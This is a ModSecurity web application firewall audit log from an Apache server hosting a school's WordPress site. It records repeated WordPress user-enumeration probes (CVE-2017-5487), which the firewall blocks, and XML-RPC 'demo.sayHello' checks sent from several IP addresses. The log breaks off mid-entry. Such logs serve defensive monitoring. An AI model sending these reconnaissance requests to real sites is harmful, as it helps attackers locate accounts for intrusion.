CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fa49533-Z-- --999fd026-A-- [10/May/2025:08:31:51 +0700] aB6shxLuBiaF9R054QBa3QAAAAA 103.236.140.4 53672 103.236.140.4 8181 --999fd026-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --999fd026-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --999fd026-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840711771978 2542 (- - -) Stopwatch2: 1746840711771978 2542; combined=1456, p1=466, p2=947, p3=0, p4=0, p5=42, sr=91, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --999fd026-Z-- --d771d965-A-- [10/May/2025:08:31:56 +0700] aB6sjBLuBiaF9R054QBa3wAAAAQ 103.236.140.4 53676 103.236.140.4 8181 --d771d965-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.76.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.76.196 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d771d965-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d771d965-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840716996085 2058 (- - -) Stopwatch2: 1746840716996085 2058; combined=1050, p1=348, p2=673, p3=0, p4=0, p5=28, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d771d965-Z-- --7c535746-A-- [10/May/2025:08:31:57 +0700] aB6sjRLuBiaF9R054QBa4AAAAAU 103.236.140.4 53678 103.236.140.4 8181 --7c535746-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.199 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7c535746-C-- demo.sayHello --7c535746-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c535746-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840717010466 4810 (- - -) Stopwatch2: 1746840717010466 4810; combined=3865, p1=442, p2=3214, p3=28, p4=31, p5=88, sr=64, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c535746-Z-- --3b3c1e7b-A-- [10/May/2025:08:32:01 +0700] aB6skauC4AqLGUOyzyX71wAAAIU 103.236.140.4 53686 103.236.140.4 8181 --3b3c1e7b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.76.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.76.196 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3b3c1e7b-C-- demo.sayHello --3b3c1e7b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b3c1e7b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840721687851 5556 (- - -) Stopwatch2: 1746840721687851 5556; combined=4105, p1=543, p2=3343, p3=31, p4=34, p5=91, sr=75, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b3c1e7b-Z-- --bc7e7813-A-- [10/May/2025:08:32:39 +0700] aB6stxLuBiaF9R054QBa5gAAAA4 103.236.140.4 53700 103.236.140.4 8181 --bc7e7813-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bc7e7813-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc7e7813-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840759499140 2814 (- - -) Stopwatch2: 1746840759499140 2814; combined=1248, p1=445, p2=772, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc7e7813-Z-- --491f1b27-A-- [10/May/2025:08:32:41 +0700] aB6suRLuBiaF9R054QBa6QAAABQ 103.236.140.4 53706 103.236.140.4 8181 --491f1b27-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.155 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --491f1b27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --491f1b27-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840761177016 1920 (- - -) Stopwatch2: 1746840761177016 1920; combined=1011, p1=329, p2=655, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --491f1b27-Z-- --1a2b4650-A-- [10/May/2025:08:32:45 +0700] aB6svRLuBiaF9R054QBa6gAAABU 103.236.140.4 53708 103.236.140.4 8181 --1a2b4650-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.129 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.129 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1a2b4650-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a2b4650-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840765233103 2845 (- - -) Stopwatch2: 1746840765233103 2845; combined=1242, p1=425, p2=788, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a2b4650-Z-- --7399d438-A-- [10/May/2025:08:32:45 +0700] aB6svRLuBiaF9R054QBa7AAAABc 103.236.140.4 53712 103.236.140.4 8181 --7399d438-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.199 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7399d438-C-- demo.sayHello --7399d438-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7399d438-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840765547491 4524 (- - -) Stopwatch2: 1746840765547491 4524; combined=3572, p1=432, p2=2941, p3=22, p4=24, p5=90, sr=65, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7399d438-Z-- --88d08462-A-- [10/May/2025:08:32:48 +0700] aB6swKuC4AqLGUOyzyX72QAAAIo 103.236.140.4 53716 103.236.140.4 8181 --88d08462-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.155 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --88d08462-C-- demo.sayHello --88d08462-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --88d08462-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840768836201 4846 (- - -) Stopwatch2: 1746840768836201 4846; combined=3825, p1=456, p2=3148, p3=31, p4=36, p5=91, sr=67, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88d08462-Z-- --8925b75d-A-- [10/May/2025:08:32:50 +0700] aB6swhLuBiaF9R054QBa7gAAABg 103.236.140.4 53720 103.236.140.4 8181 --8925b75d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.129 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.129 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8925b75d-C-- demo.sayHello --8925b75d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8925b75d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840770557761 4831 (- - -) Stopwatch2: 1746840770557761 4831; combined=3696, p1=421, p2=3047, p3=25, p4=23, p5=112, sr=72, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8925b75d-Z-- --6e484b57-A-- [10/May/2025:08:32:51 +0700] aB6swxLuBiaF9R054QBa7wAAAAM 103.236.140.4 53722 103.236.140.4 8181 --6e484b57-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 14.241.196.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.241.196.206 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6e484b57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e484b57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840771424151 1942 (- - -) Stopwatch2: 1746840771424151 1942; combined=1010, p1=332, p2=652, p3=0, p4=0, p5=26, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e484b57-Z-- --ad808338-A-- [10/May/2025:08:33:19 +0700] aB6s3xLuBiaF9R054QBa8QAAAAQ 103.236.140.4 53728 103.236.140.4 8181 --ad808338-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.106.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.106.36 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ad808338-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad808338-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840799291569 3284 (- - -) Stopwatch2: 1746840799291569 3284; combined=1430, p1=481, p2=914, p3=0, p4=0, p5=34, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad808338-Z-- --8235d951-A-- [10/May/2025:08:33:31 +0700] aB6s6xLuBiaF9R054QBa8wAAAAI 103.236.140.4 53734 103.236.140.4 8181 --8235d951-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.106.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.106.36 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8235d951-C-- demo.sayHello --8235d951-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8235d951-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840811585817 5618 (- - -) Stopwatch2: 1746840811585817 5618; combined=4075, p1=527, p2=3325, p3=29, p4=30, p5=96, sr=73, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8235d951-Z-- --15671077-A-- [10/May/2025:08:34:16 +0700] aB6tGBLuBiaF9R054QBa-QAAABE 103.236.140.4 53748 103.236.140.4 8181 --15671077-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.168 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --15671077-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15671077-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840856200705 2742 (- - -) Stopwatch2: 1746840856200705 2742; combined=1410, p1=478, p2=901, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15671077-Z-- --e55ccd79-A-- [10/May/2025:08:34:21 +0700] aB6tHRLuBiaF9R054QBa-wAAABM 103.236.140.4 53752 103.236.140.4 8181 --e55ccd79-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.168 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e55ccd79-C-- demo.sayHello --e55ccd79-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e55ccd79-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840861154470 5422 (- - -) Stopwatch2: 1746840861154470 5422; combined=4054, p1=528, p2=3304, p3=30, p4=33, p5=94, sr=74, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e55ccd79-Z-- --f505bd01-A-- [10/May/2025:08:34:53 +0700] aB6tPRLuBiaF9R054QBa_gAAAAA 103.236.140.4 53764 103.236.140.4 8181 --f505bd01-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f505bd01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f505bd01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840893468510 3181 (- - -) Stopwatch2: 1746840893468510 3181; combined=1416, p1=484, p2=898, p3=0, p4=0, p5=34, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f505bd01-Z-- --a37dbf7d-A-- [10/May/2025:08:34:59 +0700] aB6tQxLuBiaF9R054QBbAQAAAAQ 103.236.140.4 53772 103.236.140.4 8181 --a37dbf7d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.237 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a37dbf7d-C-- demo.sayHello --a37dbf7d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a37dbf7d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840899198762 5087 (- - -) Stopwatch2: 